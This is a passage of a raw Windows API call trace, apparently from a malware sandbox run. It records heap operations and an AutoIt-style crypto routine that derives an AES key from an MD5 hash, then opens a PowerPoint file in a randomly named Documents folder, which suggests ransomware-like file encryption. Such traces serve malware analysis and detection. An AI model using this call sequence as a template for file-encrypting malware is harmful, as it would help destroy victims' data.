dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0035.212] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0035.212] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.212] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.212] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.212] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.212] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0035.212] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0035.212] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.212] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5c40) returned 1 [0035.213] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.213] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.213] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0035.213] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.213] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0035.213] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0035.213] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0035.213] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0035.213] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0035.213] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a30 | out: hHeap=0x770000) returned 1 [0035.213] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0035.214] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0035.214] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0035.214] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0035.214] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0035.214] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0035.214] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0035.214] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.214] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2140 | out: hHeap=0x770000) returned 1 [0035.214] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.214] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0035.214] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.214] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0035.214] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.214] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0035.214] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0035.214] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0035.214] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0035.214] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0035.214] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.214] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.214] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.214] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.214] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0035.214] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.214] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0035.214] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.214] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.214] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0035.214] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0035.215] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0035.215] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.215] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0035.215] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.215] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0035.215] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0035.215] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.215] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0035.215] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.215] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0035.215] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.215] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0035.215] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0035.215] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0035.215] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0035.215] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0035.215] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.215] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.215] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.215] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.215] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.215] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0035.215] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0035.216] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0035.216] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0035.216] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0035.216] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0035.216] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.216] CryptCreateHash (in: hProv=0x7d5c40, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0035.216] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.216] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.216] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0035.216] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.216] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.216] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0035.216] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.216] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.216] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.216] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.216] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0035.216] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0035.216] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.216] CryptHashData (hHash=0x7c2240, pbData=0x7c97b8, dwDataLen=0x100, dwFlags=0x1) returned 1 [0035.216] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.217] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.217] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0035.217] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.217] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.217] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.217] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0035.217] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0035.217] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0035.217] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0035.217] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0035.217] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0035.217] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.217] CryptDeriveKey (in: hProv=0x7d5c40, Algid=0x660e, hBaseData=0x7c2240, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2280) returned 1 [0035.217] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.217] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.217] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c22c0 | out: hHeap=0x770000) returned 1 [0035.217] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.217] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.217] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.217] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.217] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.217] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0035.217] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0035.217] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.218] CryptDestroyHash (hHash=0x7c2240) returned 1 [0035.218] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.218] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.218] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.218] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0035.218] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.218] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2140 | out: hHeap=0x770000) returned 1 [0035.218] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.218] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\Vp6FryQ8WD7hsRBCHZV.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\pro_og0zrj3k\\vp6fryq8wd7hsrbchzv.ppt"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0035.218] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0035.218] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0035.218] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0035.218] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0035.218] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0035.218] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0035.218] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0035.218] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0035.218] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0035.218] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0035.218] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.218] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0035.218] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0035.218] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0035.218] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0035.219] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0035.219] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0035.219] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0035.219] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.219] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0035.219] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.219] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0035.219] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0035.219] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0035.219] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0035.219] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0035.219] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0035.219] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0035.219] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0035.219] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0035.219] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0035.219] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0035.219] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0035.219] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0035.219] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0035.219] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0035.219] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0035.219] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0035.219] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0035.219] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0035.219] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0035.219] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0035.219] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0035.219] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0035.219] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0035.220] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0035.220] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0035.220] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3688 [0035.220] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0035.220] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100) returned 0x7c97b8 [0035.220] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0035.220] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb0) returned 0x7c5758 [0035.220] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0035.220] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb0) returned 0x7c56a0 [0035.220] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c97b8 | out: hHeap=0x770000) returned 1 [0035.220] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0035.220] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0035.220] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0035.220] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3688 | out: hHeap=0x770000) returned 1 [0035.220] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0035.220] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5758 | out: hHeap=0x770000) returned 1 [0035.220] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0035.220] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0035.220] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0035.220] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0035.220] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc0) returned 0x7c97b8 [0035.220] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\pro_og0zrj3k")) returned 0x10 [0035.220] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c97b8 | out: hHeap=0x770000) returned 1 [0035.220] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0035.220] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c56a0 | out: hHeap=0x770000) returned 1 [0035.220] HeapFree (in: hHeap=0x770000, 